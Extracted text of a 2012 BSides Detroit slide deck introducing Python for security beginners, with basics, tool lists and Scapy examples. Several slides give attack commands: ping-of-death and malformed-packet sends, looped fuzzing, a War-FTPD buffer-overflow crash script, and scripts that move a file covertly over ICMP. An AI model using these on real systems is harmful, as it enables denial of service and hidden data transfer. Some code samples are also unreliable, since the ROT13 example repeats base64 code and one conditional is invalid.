SlideShare ist ein Scribd-Unternehmen logo

Overview of Python - Bsides Detroit 2012

Als PPTX, PDF herunterladen
T
Tazdrumm3r

The slides for a presentation I gave for beginners to give some exposure to the Python programming/scripting language.

Technologie
1 von 87
>>>import antigravity
Overview of Python Flying made simple without the Nyquil hangover Keith Dixon @Tazdrumm3r
Agenda • About me • About Python • Python basics • Python’s uses • Coding for Penetration Testers book • Tips, tricks, observations • Resources
About me Who am I? • Husband/father/geek/gets distracted by shiny objects easy • Career path switched to IT in 1999, professionally in IT since 2001 – Learning, studying, and currently interviewing for infosec professional roles • Vbscript – 2007 • Python – 2011
About Python • Conceived in the late 1980’s by Guido van Rossum at CWI. • Python 2.0 was release on October 16th, 2000 • Python 3.0 was released on December 2008
What is Python good for? • Python comes with a large standard library that covers areas such as; • string processing • Internet protocols • software engineering • operating system interfaces • Artificial intelligence (because of similarities to Lisp)
What is Python good for? Extensive use in the information security industry • Exploit development • Network • Debugging • Reverse engineering • fuzzing, • Web • Forensics • Malware analysis • PDF
What is Python good for? • Easy to write short scripts for system admin work. • Python code is easy to understand. • Once the basic syntax is learned, even the most complicated scripts can make sense.
What is Python good for? • Python is cross platform!! • It will work on Linux, Windows, Mac and most every other OS. • Many, many resources and a big, friendly community
Python tools • Social-Engineer Toolkit - specifically designed to perform advanced attacks against the human element. • Artillery - a honeypot/monitoring/prevention tool used to protect Linux-based systems. • Fast-Track - aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. • Scapy - send, sniff and dissect and forge network packets. Usable interactively or as a library • Pytbull - flexible IDS/IPS testing framework (shipped with more than 300 tests) • Scrapy - a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages • W3af - a Web Application Attack and Audit Framework.
Inspiration for the idea? (Part 1)
Inspiration for the idea? (Part 2) Post CSAW CTF
Python 101 • Indentation does matter This will work startNumber = int(raw_input("Enter the start number here ")) endNumber = int(raw_input("Enter the end number here ")) def fib(n): if n < 2: return n return fib(n-2) + fib(n-1) print map(fib, range(startNumber, endNumber)) But this won’t… startNumber = int(raw_input("Enter the start number here ")) endNumber = int(raw_input("Enter the end number here ")) def fib(n): if n < 2: return n return fib(n-2) + fib(n-1) print map(fib, range(startNumber, endNumber))
Python 101 • All scripts are considered Entire module Partial method modules >>> import sys >>> from sys import argv • All functions inside module can be used or only certain methods can be used inside script • Help is built in Help on modules Help on methods >>> Import sys, hashlib >>> Import sys, hashlib >>> help(sys) >>> help(sys.argv) >>> help(hashlib) >>> help(hashlib.sha512) keith@dw ~$ pydoc sys keith@dw ~$ pydoc sys.argv keith@dw ~$ pydoc hashlib keith@dw ~$ pydoc hashlib.sha512
Python 101 • It can be ran interactively Via command prompt Via shell keith@dw ~ $ python • IDLE • DreamPie Python 2.72 • Ipython Type “help”, “copyright”.. >>> Windows Linux • Scripts File extensions File extensions (optional) • *.py – Python script • *.py – Python script • *pyc – Compiled Python file • *pyc – Compiled Python file (generated by running script) (generated by running script) Running scripts Running scripts • .py file extension associated with • Must have #!/usr/bin/python (path python.exe to python) at the top of the script • Should have #!/usr/bin/python at • If you’re running it from the the top of the script in case you terminal, the script must be want to run it on Linux chmod’ed to make it executable or • If the path to the interpreter is in you can call python and the script your system path, you can name… doubleclick script to run, keith@dw ~ $ python password.py otherwise… C:UsersKeith>python password.py
Python 102 • Data types Numbers String List (mutable) Tuple (non mutable) A = 10 A = ‘This is a string’ list = *‘abc’, 45, ‘The list = (‘abc’, 45, ‘The B = 0100 or B = 0x41 Avengers’, 0x67, ‘def’, Avengers’, 0x67, or B = 0b1000000 print A 15.5] ‘def’, 15.5) C = 3.56 print A[0] D = 3.16j print A[3:6] print list print list print A[4:] print list [0] print list [0] • Integers print A * 2 print list [1:3] print list [1:3] • Long integers print A + “ and this is print list[2:] print list[2:] (octal, hex, how it prints” list.append*“Detroit”+ list.append(“Detroit”) binary) • Float 'This is a string' list = *‘abc’, 45, ‘The AttributeError: 'tuple' • complex ‘T’ Avengers’, 0x67, ‘def’, object has no ‘s i’ 15.5,’Detroit’+ attribute 'append’ ‘ is a string’ • Conditional If statement Else statement Elif statement statements if x = true: if x = 1: if expression1: print true print “1” statement(s) else: elif expression2: print “not 1” statement(s) else: statement(s)
Python 102 • Looping While loop For loop Loop control count = 0 code1 = (sys.argv[1]) count = 0 while (count < 9): code_split = code1.split(':') while (count < 9): print 'The count is:', count print 'The count is:', count count = count + 1 for i in code_split: count = count + 1 code1a = int(i) if count = 7: print "Good bye!" codefinal = chr(code1a) break sys.stdout.write(codefinal) print "Good bye!" • Functions Creating a function In use def base64_decode(base64_key): >>>csaw.base64_decode(‘V2VsY29tZSB0byBCc2lkZXMgRG answer=base64_key.decode('base64','strict') V0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnl print answer hbiwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yI GFsbCB0aGUgaGFyZCB3b3JrIHRoZXkgZGlkIHRvIG1ha2Ugd GhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ==‘) >>> Welcome to Bsides Detroit 2012. Make sure to thank Ryan, Steven, Wolfgang, and Kyle for all the hard work they did to make this year such a success!
Python 102 Open a file for reading Write to a file • Files #!/usr/bin/python #!/usr/bin/python f = open ('base64.txt', 'r') import sys file = f.read() if len(sys.argv)<2: answer=file.decode('base64','strict') sys.exit("Usage " + sys.argv[0] + " <Base64 code you wish to decode>n") print answer basecode = sys.argv[1] answer=basecode.decode('base64','strict') f.close ( ) print answer fo = open("base64.txt", "w") fo.write(answer) fo.close() • Input/output raw_input input #!/usr/bin/python #!/usr/bin/python str = raw_input("Enter your input: "); str = input("Enter your input: "); print "Received input is : ", str print "Received input is : ", str Input is  Thanks for coming to Bsides Input is  5 * 5 Output is  Received input is : Thanks for coming to Output is  25 Bsides
Python’s uses – General scripting • Cryptography • Password creation • Use files (write to/read from)
Cryptography Encode Base64 code #!/usr/bin/python code = raw_input("Enter the data you wish to be encoded to Base64") answer=code.encode('base64','strict') print answer Encode ROT13 code #!/usr/bin/python code = raw_input("Enter the data you wish to be encoded to Base64") answer=code.encode('base64','strict') print answer
Decrypt module #!/usr/bin/python import sys def hexdecode(hex_key): import binascii hex_split = hex_key.split(':') for decode in hex_split: hex_decode = binascii.a2b_hex(decode) sys.stdout.write(hex_decode) def uni_decode(unicode_key): unicode_split=unicode_key.split(':') for i in unicode_split: code1a = int(i) codefinal = chr(code1a) sys.stdout.write(codefinal) def base64_decode(base64_key): answer=base64_key.decode('base64','strict') print answer def binary_decode(binary_key): import math f = lambda v, l: [v[i*l:(i+1)*l] for i in range(int(math.ceil(len(v)/float(l))))] basecode = f (binary_key,8) for code in basecode: x = (code) decodea = int(code,2) decodeb = chr(decodea) sys.stdout.write(decodeb) def rot13_decode(rot13_key): answer=rot13_key.decode('rot13','strict') print answer
Decrypt module
Decrypt module
Password creation ##Author: ATC ##Please score this on activestate import string, random print "How many characters would you like the password to have?" print "Must be nine or more" length = input () password_len = length password = [] for group in (string.ascii_letters, string.punctuation, string.digits): password += random.sample(group, 3) password += random.sample( string.ascii_letters + string.punctuation + string.digits, password_len - len(password)) random.shuffle(password) password = ''.join(password) print password http://code.activestate.com/recipes/577905-password-generator/
Use files (write to/read from) Read from a file #!/usr/bin/python f = open ('base64.txt', 'r') file = f.read() answer=file.decode('base64','strict') f.close ( ) Write to a file #!/usr/bin/python code = raw_input("Enter the data you wish to be encoded to Base64") answer=code.encode('base64','strict') f=open('base64.txt','w') line=f.write(answer) f.close ( )
Python’s uses – Networking • Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library • Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests) • Mallory, man-in-the-middle proxy for testing • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist • pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection • Dirtbags py-pcap: read pcap files without libpcap • flowgrep: grep through packet payloads using regular expressions • httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries http://www.dirk-loss.de/python-tools.htm
Scapy www.secdev.org/projects/scapy/ • Packet creation • Classic attacks • Read PCAP files • Malformed packets • Create graphical dumps • Ping of death • Must have appropriate supporting • Nestea attack tools installed • ARP cache poisoning • Fuzzing • Scans • Send and receive packets • SYN scan • TCP traceroute (can do graphical dump • ACK scan as well) • XMAS scan • Sniffing • IP scan • Send and receive files through • TCP port scan alternate data channels (ICMP) • IKE scan • Ping • Advanced traceroute • ARP ping • TCP SYN traceroute • ICMP ping • UDP traceroute • TCP ping • DNS traceroute • UDP ping • VLAN hopping • Wireless frame injection • Wireless sniffing • OS Fingerprinting • Firewalking
Scapy • Packet creation • Stacking layers
Scapy • Read PCAP files • A=rdpcap(“<directory where PCAP file is>/<pcap file>”) • Create graphical dumps • A[<packet number>].psdump(“<location to store .eps file>, layer_shift=1)
Scapy ConfickerB9hrs.pcap
Scapy Send packets • send(IP(dst=“192.168.1.1")/ICMP()) • sendp(Ether()/IP(dst=" 192.168.1.1 ",ttl=(1,4)), iface="eth0") • sendp(rdpcap("/tmp/pcapfile"))
Scapy
Scapy sendp("I’m travelling on Ethernet", iface="eth0", loop=1, inter=0.2)
Scapy Send and receive packets • p=sr1(IP(dst="www.slashdot.org") /ICMP()/"XXXXXXXXXXX") • p=sr1(IP(dst="www.slashdot.org") /ICMP()/" ABCDEFGHIJ ") • p.show()
Scapy Send and receive packets • p=sr1(IP(dst="www.slashdot.org")/ICMP()/“ABCDEFGHIJ")
Scapy Send and receive packets • sr(IP(dst="192.168.1.10")/TCP(dport=[21,22,23])) • sr(IP(dst=" 192.168.1.10 ")/TCP(dport=[21,22,23]),inter=0.5,retry=-2,timeout=1)
Scapy Fuzzing • send(IP(dst=“192.168.1.10")/fuzz(ICMP()/NTP(version=4)),loop=1) • send(IP(dst="192.168.1.10")/fuzz(TCP()/NTP(version=4)),loop=1)
TCP traceroute • res,unans = traceroute(["www.microsoft.com","www.cisco.com","www.yahoo.com ],dport=[80,443],maxttl=20,retry=-2) " Scapy
Scapy
Scapy Sniffing • sniff(filter="icmp and host 66.35.250.151", count=2) • a=_ • a.nsummary() • a[1] • sniff(iface="eth0", prn=lambda x: x.show())
Scapy
SYN scan • sr1(IP(dst="72.14.207.99")/TCP(dport=80,flags="S")) Scapy • sr(IP(dst="192.168.1.1")/TCP(sport=666,dport=(440,443),flags="S")) • sr(IP(dst="192.168.1.1")/TCP(sport=RandShort(),dport=[440,441,442,443],flags="S")) • ans.summary() • ans.summary( lambda(s,r): r.sprintf("%TCP.sport% t %TCP.flags%") )
Scapy Classic attacks • Malformed packets • send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP()) • Ping of death • send( fragment(IP(dst=" 192.168.1.10 ")/ICMP()/("X" * 60000)) )
• send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP()) Scapy • send( fragment(IP(dst=" 192.168.1.10 ")/ICMP()/("X" * 60000)) )
Scapy
Scapy To send packets via ICMP #!/usr/bin/python import sys from scapy.all import * conf.verb = 0 f = open(sys.argv[1]) data = f.read() f.close() host = sys.argv[2] print "Data size is %d " %len(data) i=0 while i<len(data): pack = IP(dst=host)/ICMP(type="echo-reply")/data[i:i+32] send(pack) i = i+32 print "Data sent"
Scapy To receive packets via ICMP #!/usr/bin/python import sys from scapy.all import * conf.verb=0 f=open(sys.argv[1],"w") host=sys.argv[2] count = int(sys.argv[3]) filter="icmp and host " + host print "sniffing with filter (%s) for %d bytes" % (filter,int(count)) packets = sniff(count,filter=filter) for p in packets: f.write(p['Raw'].load) f.close() print "Data received"
Python’s uses – Debugging and Reverse Engineering • Immunity Debugger: scriptable GUI and command line debugger • mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro • pefile: read and work with Portable Executable (aka PE) files • pydasm: Python interface to the libdasm x86 disassembling library • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory • diStorm64: disassembler library for AMD64, licensed under the BSD license • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python • vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it (mirror) • Androguard: reverse engineering and analysis of Android applications http://www.dirk-loss.de/python-tools.htm
Coding for Pentesters - Exploitation scripting
Coding for Pentesters – Exploitation scripting Building Exploits with Python 1. Windows XP SP0 2. War-FTPD v 1.65 3. Immunity Debugger
Coding for Pentesters – Exploitation scripting Step 1 – Open WarftpD with Immunity
Coding for Pentesters – Exploitation scripting Step 2 – Run WarFTPD by pressing F9 and then set it to GoOnline.
Coding for Pentesters – Exploitation scripting Step 3 – Build this script and run it…. and enjoy the show #!/usr/bin/python import sys import socket hostname = sys.argv[1] username = "A"*1024 passwd = "anything" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("[-] Connection error!") sys.exit(1) r = sock.recv(1024) print "[+] " + r sock.send("user %srn" %username) r = sock.recv(1024) print "[+] " + r sock.send("pass %srn" %passwd) r = sock.recv(1024) print "[+] " + r sock.close()
Coding for Pentesters – Exploitation scripting The connection attempt with the user name of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Coding for Pentesters – Exploitation scripting
Coding for Pentesters – Exploitation scripting Step 4 - WarFTPD crashes!
Python’s uses – Malware analysis • torwget.py: Multi-platform TOR-enabled URL • clamav_to_yara.py: Convert ClamAV antivirus signatures to YARA rules • peid_to_yara.py: Convert PEiD packer signatures to YARA rules • av_multiscan.py: Script to implement your own antivirus multi- scanner • pescanner.py: Detect malicious PE file attributes • ssdeep_procs.py: Detect self-mutating code on live Windows systems using ssdeep • avsubmit.py: Command-line interface to VirusTotal, ThreatExpert, Jotti, and NoVirusThanks • dbmgr.py: Malware artifacts database manager • artifactscanner.py: Application to scan live Windows systems for artifacts (files, Registry keys, mutexes) left by malware • mapper.py: Create static PNG images of IP addresses plotted on a map using GeoIP • googlegeoip.py: Create dynamic/interactive geographical maps of IP addresses using Google charts • sc_distorm.py: Script to produce disassemblies (via DiStorm) of shellcode and optionally apply an XOR mask • vmauto.py: Python class for automating malware execution in VirtualBox and VMware guests • mybox.py: Sample automation script for VirtualBox based on vmauto.py
Python’s uses – Malware analysis • myvmware.py: Sample automation script for VMware based on vmauto.py • analysis.py: Python class for building sandboxes with support for analyzing network traffic, packet captures, and memory • scd.py: Immunity Debugger PyCommand for finding shellcode in arbitrary binary files • findhooks.py: Immunity Debugger PyCommand for finding Inline-style user mode API hooks • pymon.py: WinAppDbg plug-in for monitoring API calls, alerting on suspicious flags/parameters and producing an HTML report • xortools.py: Python library for encoding/decoding XOR, including brute force methods and automated YARA signature generation • trickimprec.py: Immunity Debugger PyCommand for assistance when rebuilding import tables with Import REconstructor • kraken.py: Immunity Debugger PyCommand for cracking Kraken’s Domain Generation Algorithm (DGA) • sbstrings.py: Immunity Debugger PyCommand for decrypting Silent Banker strings • install_svc.py: Python script for installing a service DLL and supplying optional arguments to the service • dll2exe.py: Python script for converting a DLL into a standalone executable • windbg_to_ida.py: Python script to convert WinDbg output into data that can be imported into IDA
Python’s uses – Malware analysis Practical Malware Analysis • FakeNet - http://practicalmalwareanalysis.com/
Python’s uses – Malware analysis • Cuckoo Sandbox - a malware analysis system used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. • yara-python: identify and classify malware samples • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content • pyClamAV: add virus detection capabilities to your Python software • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities • phoneyc: pure Python honeyclient implementation http://www.dirk-loss.de/python-tools.htm
Python’s uses – Fuzzing • Sickfuzz: a fuzzer made out of several custom .spk files and a python script to wrap them up, including some tshark support and other features. • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing • antiparser: fuzz testing and fault injection API • TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer) • FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns • Fuzzbox: multi-codec media fuzzer • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms • WSBang: perform automated security testing of SOAP based web services • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner • fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano • Fusil: Python library used to write fuzzing programs http://www.dirk-loss.de/python-tools.htm
Python’s uses – Fuzzing Sickfuzz
Python’s uses – Web • Scrapy: a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages. It can be used for a wide range of purposes, from data mining to monitoring and automated testing. • ProxMon: processes proxy logs and reports discovered issues • Twill: browse the Web from a command-line interface. Supports automated Web testing • Windmill: web testing tool designed to let you painlessly automate and debug your web application • FunkLoad: functional and load web tester • spynner: Programmatic web browsing module for Python with Javascript/AJAX support • python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions http://www.dirk-loss.de/python-tools.htm
Python’s uses – Web http://snippets.scrapy.org/snippets/7/
Python’s uses – Forensics • Volatility: extract digital artifacts from volatile memory (RAM) samples • SandMan: read the hibernation file, regardless of Windows version • LibForensics: library for developing digital forensics applications • TrIDLib, identify file types from their binary signatures. Now includes Python binding • aft: Android forensic toolkit http://www.dirk-loss.de/python-tools.htm
Python’s uses – Forensics Volatility
Python’s uses – Miscellaneous • InlineEgg: toolbox of classes for writing small assembly programs in Python • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging • RevHosts: enumerate virtual hosts for a given IP address • simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools (abandoned?) • Hachoir: view and edit a binary stream field by field Other useful libraries and tools • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system • Beautiful Soup: HTML parser optimized for screen-scraping • Mayavi: 3D scientific data visualization and plotting • Twisted: event-driven networking engine • Suds: lightweight SOAP client for consuming Web Services • M2Crypto: most complete OpenSSL wrapper • NetworkX: graph library (edges, nodes) • pyparsing: general parsing module • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language • Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python • Pexpect: control and automate other programs, similar to Don Libes `Expect` system • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython • PyQt and PySide: Python bindings for the Qt application framework and GUI library http://www.dirk-loss.de/python-tools.htm
Coding for Penetration Testers book Script Function Learned Webcheck_v1.py Monitor web server – verify it 1. Script arguments remains up 2. Connect to web server and run a GET request Webcheck_v2.py Monitor web server – verify it 1. Alternate script arguments method remains up (default to port 80) Subnetcalc.py Calculate subnet mask, broadcast 1. Parse out values programmatically address, network range, and 2. Math functions with variables gateway from IP/CIDR 3. Displaying results 4. Using FOR loops Pass.py Determines if users are using the 1. Use the crypt module original default assigned password Robotparser.py Retrieve the paths from the 1. Parse the robots.txt file with the built robotparser module robot.txt 2. Nesting FOR loops root_check.py Checks to see what permissions 1. Using IF and ELIF conditional statements logged in account has (normal 2. Use OS module to make system calls user, root or system account) Readshadow.py Checks to see if you have 1. Use OS module to make system calls permission to read /etc/shadow 2. Tests permissions on files to see if current credentials can read file Network_socket.py Connect to website, pull contents 1. Network socket creation (hard coded) 2. Spaces will bite you in the ass where you least expect it.
Coding for Penetration Testers book Script Function Learned network_socket_argum Connect to website, pull contents 1. Network socket creation ent.py (site specified by argument) 2. Spaces will bite you in the ass where you least expect it. Server_connect.py Once a connection is made, send 1. Network socket creation back a string 2. Allow incoming connections. receiveICMP.py To receive a file from another 1. Python script using Scapy system via ICMP (in conjunction with sendICMP.py) sendICMP.py To send a file to another system 1. Python script using Scapy via ICMP (in conjunction with receiveICMP.py)
Little gems I found Description Function Site Python-nmap It’s a Python library which helps in http://xael.org/norman/python/python- using nmap. nmap/ Python API to the VirtualBox Allowing you to control every http://download.virtualbox.org/virtualbox VM aspect of virtual machine /SDKRef.pdf configuration and execution Py2Exe py2exe is http://www.py2exe.org/ a Python Distutils extension which converts Python scripts into executable Windows programs, able to run without requiring a Python installation. Chrome Various extensions/applications • https://chrome.google.com/webstore/ extensions/applications found in the Chrome Webstore detail/gdiimmpmdoofmahingpgabiikim jgcia <-- Python shell (browser button) • https://chrome.google.com/webstore/ detail/cmlchnlmkdcpelgmkebknjgjgdd ncelc - Python shell (Chrome application) • https://chrome.google.com/webstore/ detail/nckbgikkpbjdliigbhgjfgfcahhona kp <-- Online Python development environment
Little gems I found Extra extra credit Description Function Site Tweepy It’s the best working Python http://tweepy.github.com/ library to interface with Twitter (so far)
Tweepy • Direct message • Check friends timelines • Create favorites http://talkfast.org/2010/05/31/twitter-from-the-command-line-in-python-using-oauth
Tips, tricks, etc. IDE (http://wiki.python.org/moin/IntegratedDevelopmentEnvironments) • Windows • PyScripter • Aptana Studio • IDLE • Ninja • Wing IDE • Linux • IDLE • Geany • Python Toolkit • SPE • ERIC (supposed to have auto-complete of code…) Editors (http://wiki.python.org/moin/PythonEditors) • Windows • Notepad++ • Linux • Gedit • SCiTE
Tips, tricks, etc. Shells • DreamPie • Automatic of completion of attributes and file names • History box • Code box • IDLE • Included with Python install • Ipython • PyShell • Guake Other • PythonAnywhere • http://pythonanywhere.com/
Tips, tricks, etc. Linux vs. Windows Linux • Linux scripts can be ran via terminal • calling python <script name> • by putting #!/usr/bin/python at the top (path to interpreter) and typing ./<script name> • Common problem on PyScripter (awesome Windows Python IDE)… extra code comments are put at the top, then the #! /usr/bin/python Windows • Windows scripts don’t need the #! but need to have .py associated with Python interepreter. • Scripts can be double clicked or ran from command prompt python <script name> • If the script is double clicked, without having raw_input("Press ENTER to exit") you may not see the output of the script.
Portable Python (Windows only) • Portable Python is a Python® programming Tips, tricks, etc. language preconfigured to run directly from any USB storage device, enabling you to have, at any time, a portable programming environment. Just download it, extract to your portable storage device or hard drive and in 10 minutes you are ready to create your next Python® application. • Portable Python 2.7.2.1 package contains following applications/libraries: • PyScripter v2.4.1 • NymPy 1.6.0 • SciPy 0.90 • Matplotlib 1.0.1 • PyWin32 216 • Django 1.3 • PIL 1.1.7 • Py2Exe 0.6.9 • wxPython 2.8.12.0 • Portable Python 3.2.1.1 package contains following applications/libraries (alphabetical order): • NetworkX v1.4 • PySerial 2.5 • PyScripter v2.4.1 • PyWin32 v.216 • RPyC-3.0.7
Additional resources
Beginners guides from Python Additional resources • http://wiki.python.org/moin/BeginnersGuide/NonProgrammers • http://wiki.python.org/moin/BeginnersGuide/Programmers Extra tools • http://mashable.com/2007/10/02/python-toolbox/ Online exercises • http://codingbat.com/python • http://homepage.mac.com/s_lott/books/python.html • http://web.archive.org/web/20110625065328/http://diveintopython.org/toc/index.html • http://anh.cs.luc.edu/python/hands-on/ • http://code.google.com/edu/languages/google-python-class/index.html • http://www.cdf.toronto.edu/~csc148h/winter/ • http://www.cdf.toronto.edu/~csc108h/fall/ • http://projecteuler.net/ • http://www.upriss.org.uk/python/PythonCourse.html • http://www.pythonchallenge.com/ • http://learnpythonthehardway.org/ • http://www.awaretek.com/tutorials.html • http://www.checkio.org/ • http://www.pyschools.com/ General learning materials • http://www.py4inf.com/
Free online videos Additional resources • http://freevideolectures.com/Course/2512/Python-Programming • http://showmedo.com/videotutorials/python • http://www.python.org/doc/av/ • http://thenewboston.org/list.php?cat=36 Online books • http://en.wikibooks.org/wiki/Python_Programming Online interactive tutorial/interpreter • http://www.trypython.org • http://www.learnpython.org/ • https://languageshells.appspot.com/ Forums • http://www.python-forum.org • http://stackoverflow.com/questions/tagged/python • http://www.daniweb.com/software-development/python/114 Module/package repositories • http://pypi.python.org/pypi The Python Package Index is a repository of software for the Python programming language. There are currently 17409 packages here. • http://code.activestate.com/recipes/ The ActiveState Code Recipes contains 3850 snippets to learn from and use. Python tools for penetration testers • http://www.dirk-loss.de/python-tools.htm
Training • SecurityTube Python Scripting Expert Additional resources • http://securitytube-training.com/certifications/securitytube- python-scripting-expert/?id=main • Module 1: Python Scripting – Language Essentials • Module 2: System Programming and Security • Module 3: Network Security Programming – Sniffers and Packet Injectors • Module 4: Attacking Web Applications • Module 5: Exploitation Techniques • Module 6: Malware Analysis and Reverse Engineering • Module 7: Attack Task Automation • Module 8: Further Study and Roadmap • Module 9: Exam Pattern and Mock Exam • PYTHON TRAINING FOR SECURITY PROFESSIONALS • http://www.trainace.com/courses/python/ • Log Parsing with Python • Pcap Parsing with Python • Network Attack with Python • Web Application Attack with Python • Malware Analysis with Python • Exploit Development with Python
All the scripts Category Script CSAW Crypto Redux – Challenge 1 to 5 Extra credit Coding for Penetration Testers – part 1 Coding for Penetration Testers – part 2 Coding for Penetration Testers – part 3 Extra extra credit
Etc. Antigravity • When you open up ModulesDocs and click on antigravity module or from IDLE run import antigravity, a web browser opens to the XKCD cartoon at the beginning of this slide deck. Zen of Python • To start the path of finding Zen of Python, remember these two key words… IMPORT THIS . • From an IDE (IDLE) or a Python shell, run import this and the Zen of Python will be revealed.
Etc.
Final thoughts
Questions? Keith Dixon @Tazdrumm3r #misec – Tazdrumm3r tazdrummer@gmail.com http://tazdrumm3r.wordpress.com

Empfohlen

Overview of python misec - 2-2012
Overview of python misec - 2-2012Overview of python misec - 2-2012
Overview of python misec - 2-2012Tazdrumm3r
 
2016 bioinformatics i_python_part_1_wim_vancriekinge
2016 bioinformatics i_python_part_1_wim_vancriekinge2016 bioinformatics i_python_part_1_wim_vancriekinge
2016 bioinformatics i_python_part_1_wim_vancriekingeProf. Wim Van Criekinge
 
2016 bioinformatics i_python_part_2_strings_wim_vancriekinge
2016 bioinformatics i_python_part_2_strings_wim_vancriekinge2016 bioinformatics i_python_part_2_strings_wim_vancriekinge
2016 bioinformatics i_python_part_2_strings_wim_vancriekingeProf. Wim Van Criekinge
 
SWIG : An Easy to Use Tool for Integrating Scripting Languages with C and C++
SWIG : An Easy to Use Tool for Integrating Scripting Languages with C and C++SWIG : An Easy to Use Tool for Integrating Scripting Languages with C and C++
SWIG : An Easy to Use Tool for Integrating Scripting Languages with C and C++David Beazley (Dabeaz LLC)
 
Using SWIG to Control, Prototype, and Debug C Programs with Python
Using SWIG to Control, Prototype, and Debug C Programs with PythonUsing SWIG to Control, Prototype, and Debug C Programs with Python
Using SWIG to Control, Prototype, and Debug C Programs with PythonDavid Beazley (Dabeaz LLC)
 
pyconjp2015_talk_Translation of Python Program__
pyconjp2015_talk_Translation of Python Program__pyconjp2015_talk_Translation of Python Program__
pyconjp2015_talk_Translation of Python Program__Renyuan Lyu
 
Ry pyconjp2015 karaoke
Ry pyconjp2015 karaokeRy pyconjp2015 karaoke
Ry pyconjp2015 karaokeRenyuan Lyu
 
